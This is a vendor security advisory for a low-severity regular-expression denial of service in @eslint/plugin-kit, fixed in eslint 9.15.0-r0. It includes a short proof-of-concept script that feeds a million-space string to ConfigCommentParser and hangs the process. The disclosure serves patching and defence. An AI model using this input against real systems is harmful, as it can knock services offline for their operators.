CGA-v55f-9838-wrpj

Published

Last updated

https://images.chainguard.dev/security/CGA-v55f-9838-wrpj

Package

eslint

Latest Update

Fixed

Fixed Version

9.15.0-r0

Aliases

Severity

3.5

Low

CVSS V3

Summary

Regular Expression Denial of Service (ReDoS) in @eslint/plugin-kit

Description

Crafting a very large and well crafted string can increase the CPU usage and crash the program.

POC


const { ConfigCommentParser } = require("@eslint/plugin-kit");

var str = "";
for (var i = 0; i < 1000000; i++) {
  str += " ";
}
str += "A";

console.log("start")
var parser = new ConfigCommentParser();
console.log(parser.parseStringConfig(str, ""));
console.log("end")

// run `npm i @eslint/plugin-kit` and `node attack.js` 
// then the program will stuck forever with high CPU usage

References

Updates

Advisories are based on vulnerability information provided by Grype from Anchore. Learn how Chainguard creates security advisories.

Safe Source for Open Source™

Media Kit Contact Us

Private Policy

CGA-v55f-9838-wrpj

Severity

Summary

Description

POC

References

Updates

Product

Why Chainguard

Customers

Company

Resources